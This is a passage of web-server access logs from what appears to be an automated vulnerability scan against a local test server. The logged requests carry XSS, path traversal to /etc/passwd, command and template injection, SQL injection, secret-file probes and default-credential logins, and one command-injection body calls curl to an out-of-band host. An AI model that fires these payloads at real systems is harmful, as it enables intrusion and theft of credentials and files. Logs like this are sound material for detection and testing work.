+0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"\x22name\x22:\x22';$(curl http://ca281d8smpvb9r2g07h0fjpmu36g9fo9y.oast.site);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"op_type=ping&destination=%3Bid","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tools.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/tools.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"\x0D\x0A{\x0D\x0A \x22type\x22:\x22EXEC\x22,\x0D\x0A \x22mbean\x22:\x22com.sun.management:type=HotSpotDiagnostic\x22,\x0D\x0A \x22operation\x22:\x22dumpHeap\x22,\x0D\x0A \x22arguments\x22:[\x0D\x0A \x22/tmp1234/test1.hprof\x22,\x0D\x0A 0\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29K9NKSnBOo86hkdrQhYIlJWKzZ.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 